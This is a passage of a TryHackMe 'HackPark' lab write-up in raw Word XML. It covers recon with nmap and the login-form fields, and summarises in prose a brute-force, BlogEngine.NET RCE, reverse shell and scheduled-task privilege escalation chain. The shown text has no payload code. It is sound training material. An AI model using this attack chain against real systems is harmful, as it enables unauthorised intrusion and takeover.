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4E79"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration Testing Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">TryHackMe — HackPark Room</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Web Application Assessment: Login Brute-Forcing, BlogEngine.NET RCE, and Scheduled-Task Privilege Escalation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F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6950"/>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6950"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HackPark (TryHackMe room)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="EAF1F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Target OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6950"/>
            <w:shd w:fill="EAF1F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows (IIS web server, RDP 3389 open)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6950"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Educational / CTF — gain initial access and escalate to NT AUTHORITY\SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="EAF1F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Attack Surface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6950"/>
            <w:shd w:fill="EAF1F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP (Port 80) — BlogEngine.NET CMS with an exposed admin login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6950"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Legal lab environment — TryHackMe. For learning purposes only.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This report documents a full offensive-security walkthrough of the TryHackMe room "HackPark", a beginner-to-intermediate Windows-based lab. The engagement follows the classic penetration testing lifecycle: reconnaissance, enumeration, credential attacks, exploitation, and privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The web application running on the target is built on BlogEngine.NET. The admin login panel was reachable without any restriction, which allowed a password brute-force attack against a known account. Once authenticated, a known Remote Code Execution vulnerability in the BlogEngine.NET version in use (CVE-2019-6714) was leveraged to upload a malicious .ascx control and obtain a reverse shell as the low-privileged 'iis apppool\blog' service account. Privilege escalation to NT AUTHORITY\SYSTEM was then achieved by identifying a scheduled task that repeatedly executed a writable binary (Message.exe) and replacing it with a malicious payload — a classic insecure-service / binary-hijack technique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The key lessons for defenders are: never expose an unrestricted login form to brute-force attempts, keep third-party CMS software patched, and ensure scheduled tasks/services do not execute binaries from directories writable by low-privileged accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Scope and Rules of Engagement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This assessment was performed entirely inside TryHackMe's isolated lab infrastructure — a legal, sanctioned environment built specifically for practicing these techniques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No real organisation, individual, or production system was targeted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All tools and techniques below are documented strictly for educational purposes: CTF practice, skill-building, and understanding attacker methodology so that equivalent defences can be designed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Tools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4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6150"/>
            <w:shd w:fill="1F4E79"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b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6150"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Port scanning and service/version enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="EAF1F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Web Browser / View-Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6150"/>
            <w:shd w:fill="EAF1F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Manual web reconnaissance of the blog and admin panel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6150"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Intercepting the login POST request to study its parameters (__VIEWSTATE, __EVENTVALIDATION, UserName, Password)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="EAF1F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Hydra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6150"/>
            <w:shd w:fill="EAF1F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP POST-form brute-force attack against the admin login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">searchsploit / Exploit-DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6150"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Locating the public exploit for BlogEngine.NET (CVE-2019-6714)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="EAF1F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Netcat (nc)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6150"/>
            <w:shd w:fill="EAF1F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Catching the first raw reverse shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploit Framework (msfvenom, multi/handler)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6150"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Generating a Meterpreter payload and handling the upgraded shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="EAF1F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">WinPEAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6150"/>
            <w:shd w:fill="EAF1F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Automated Windows privilege-escalation enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Meterpreter (post/windows/gather/enum_services, sysinfo, getsystem)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6150"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Service enumeration and privilege escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The engagement began with an Nmap scan of the target to map the exposed attack surface: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nmap -sC -sV -oN nmap_initial.txt &lt;TARGET_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Results showed three notable services:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Port 80 (HTTP) — Microsoft IIS, hosting a blog named "HackPark Amusements"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Port 3389 (RDP) — Remote Desktop, confirming the target is Windows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Port 5985 (WinRM) — Windows Remote Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A robots.txt file on the web server was checked for disallowed paths, which is a quick way to discover hidden directories such as admin or login pages that the site owner did not want indexed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attacker vs. Defender note: from an attacker's perspective, robots.txt, page source, and banner information are 'free' reconnaissance — no exploitation required. Defenders should never rely on robots.txt or hidden paths as a security control; it only hides links from search engines, not from a determined tester.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Web / Login Form Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Browsing to the site revealed a login page for what turned out to be the site's admin portal, built on the BlogEngine.NET platform. Before attempting any automated attack, it is essential to understand exactly how the form submits data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using the browser's Developer Tools (Inspect → Network tab), the login form was confirmed to submit an HTTP POST request. The captured request also contained two ASP.NET-specific hidden fields:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">__VIEWSTATE — encodes the serialized state of ASP.NET Web Forms controls between requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">__EVENTVALIDATION — an anti-tampering token ASP.NET generates to make sure form data was not forged</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Both values must be sent back to the server exactly as issued, or the request is rejected before the username/password are even checked. This was confirmed by intercepting a login attempt in Burp Suite with Proxy → Intercept turned on, sending the raw POST request to Repeater for later reuse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
